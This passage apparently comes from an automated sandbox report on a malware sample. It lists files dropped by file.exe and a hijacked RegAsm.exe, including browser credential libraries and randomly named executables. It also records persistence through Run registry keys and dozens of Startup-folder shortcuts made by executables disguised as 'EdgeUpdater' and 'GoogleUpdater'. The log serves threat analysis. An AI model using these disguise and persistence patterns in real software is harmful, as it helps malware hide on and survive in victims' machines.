                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\mozglue[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nss3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\msvcp140[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\JJJEGCGDGH.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\userCGHCGIIDGD.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\softokn3[1].dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fbfcc301a31_swws[1].exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\66fbfccd837ac_vadggdsa[1].exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\EBAEBFIIEC.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\userJEHDHIEGII.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FIEHIIIJDA.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\EBAEBFIIEC.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\FIEHIIIJDA.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\JJJEGCGDGH.exeJump to dropped file
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file

                            Boot Survival

                            barindex
                            Creates multiple autostart registry keys
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_057e415b921b4c378f9896f9d0db791fJump to behavior
                            Source: C:\Users\user\Desktop\file.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LKMService_f5ad86b5dd8e489690bbd1068a1566bcJump to behavior
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7f7765716ecd48468fd42866f53e185b.lnkJump to behavior
                            Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7f7765716ecd48468fd42866f53e185b.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_184c5b243f6e4357a0e976190a4f7cb3.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_33e3c96f8f0e451abcf40414b467f00e.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fa77a108aacc4248a80e0b77d9590ff7.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1f7c1c49e34e415cab27193ab44807e0.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9d20ef342720412b8e70c55d8f3213a0.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2248f20f044f4c4cbee8f92a4524a738.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_48ccaff91cd041ae80361f511486590f.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2aa1c12a23cf42629c5248e0898582f5.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_61b2706f85d14fec9c863d1fe733f363.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_66b58aade5ea4867b44220c6fa235449.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c92e0f63f6584d9f81176fd36293b446.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_03e867621a2c492fbfe23aa0225bca09.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_35ee50e71e6c4619b71b70b242ae8ac6.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_882f2ea546114f569d41d630426c0bbc.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ebae18e01c0b4596ae53abe0c92bbefb.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_31e0f9699af5449dbbe1811f9f2a862a.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8e8ecdc88e2d46cfa55c46f7693e1dfd.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e857420dceee46fb954a73994ced1226.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e4cf168250ea4406a6a1577cb51c9ce2.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_523c6ede001f4d268d715ccc1fa5fb3a.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cd5ef6ce168c438996448b48dcaf4d98.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1a522d1817c644eaa1a640b7dd1d131c.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3403f693031745c8b85a66353f3ace7e.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_90b565cfb8d5467eb01c0089fa4d1a69.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8cf57d72702e40c3b0a61c02602e4129.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bf5e484fccdf4c3a962baa6cdbdb684a.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b79c001705c7471c9b09da7c8889443b.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2234a4242580420787d55bfd4dcf2a4c.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a646bd2097034060960970137187629f.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ce6e443813a54514b9787afeecbaa12b.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_657ff44e105c473b8853327459bcb359.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_feba33a9d8824e9086cf3b9956b004f1.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fbd8d13802b7486295921513e688aa8e.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_27cbb7ed26514b6aa95ad6d80834ca4b.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_a3686568f4ba4794b959cf373d8966f0.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9ec753f0a9ec4c1cbaafc018f53c78c1.lnkJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_61b4ecc36b264b268216526fd7ddf283.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_9bc5d188b4b448aeb6a31847a5253a29.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cc6e27735bba4e3e8a34973f2b1f979b.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_94b4737f5a054c36bd0bc554b72d5bec.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_90db52d201554e3ba1e50023858960a2.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f145fbb386624bdc90d4fb936d0d31f9.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7bfcb7d5ed9443a089edfeee5f821613.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_57a7b6ccf06242a284e202f36ebfdd49.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fd3471df27fd4319ab5faf0a9c95ebdb.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_0dd7fd62174d4285b03947e7bfc87b65.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4fdf717f7b074146a6c5e1dc515a8133.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_50f2993888c342ef9871af89b3867487.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ac72fec142844639a98515ad8c85ebf2.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_32b39e4b230646d2923ad7debb4f6adf.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e75d8cdd821b422ab8ef7c290f300f9d.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_23ad112211624e9bbf89add5fabfa281.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f589e96998a840e99c32bab51e3a14e2.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d4d48885a01b48b1b10cf800b9243bfb.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dc24401338dd4828b0012a71af1e6767.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_19de10f190114ebcae0b8dcf51d2111a.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f9bd0fb08f8243309886214d0502bb0d.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bad8a4f53f8247f48542c0906ec45d40.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3019ecd989774f7c91e19aadfbea9368.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fc1d17b0be824c6fbda0b504268f8568.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_2b713b538e1142d0893c7c62fba4dd32.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_da692d66d16e43e98f159af92d7ca084.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1acaba343b364a7db82c6833895dd99b.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_243760fb74354fe5804142083c1a038e.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bb968b56f9e847ceb95b39fa591b4c77.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d0ecb11db6f242d7aa67790316d0e505.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_905d293f7bcf4e1fb35a2d558ade10e5.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3b56e29be77143af8bde562f2760f188.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_fe331d6b768944e890bff83892934178.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8d7af83ba5b944efa6845139e48f6165.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_6816d158af9343beb893d1364e0fd2e4.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_5a5761ee76794740b5270c0c2e3b1236.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_dcd7a5988682499dbe1e228e9be6f91e.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e657ac0296464444873343492714d2aa.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_ce7d7fb0cabe4fd0b1ca071b2f180417.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c1dfbca3911145b08091a865bac69e32.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_e2a898970d994bc8b1a1171ad357b707.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_d4990009ee12483c925ae51afb3a5d2d.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_36951cf5aef1466cb61eacc27e3b5823.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_23f2539bf87b4472935fcbb98ee0933e.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_18a8c1823ade40de9a0d640e06558cd1.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c5f5c59425a8470e95d441ef95b94f08.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_46b371e47ae14db5a06b9dbcd7681d4e.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_4a175a2de0d44214a41f9a6bbda7f9cc.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7744945ac9674795b20afd2cdad9a5d1.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_c735b92f69974d86b917177ddaffade0.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_33957e70193545b19ff95d490aa522ff.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_cea5a8b48294490ba1778d45c01931cf.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1fdad6c98be145cabd91792daf54ee49.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_bcea63d5cf1e40668c910026c61fbbe1.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_08cb3c594e2e4ed6b75f154e4c73428d.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_8249d808890c4adbb844a32dc8fcc90c.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_f1aecd4e2b3a4524ae05bac400b1e8f8.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_666ad270d6a945c18b2ed969cdd2fdfd.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_b9dd23ed908349939df79b6e6b11c2d5.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_56ef7a19bbfc4202b97b115ecc0b343c.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_aff57713a0f143e6ab4cfbcbecf0029d.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_7b11fe00f6784f4493b884c053aa480e.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_1a285354ff3547a5b61dbb65109a408b.lnk
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LKMService_3d2f22f76a3944d4b3a3725942944392.lnk
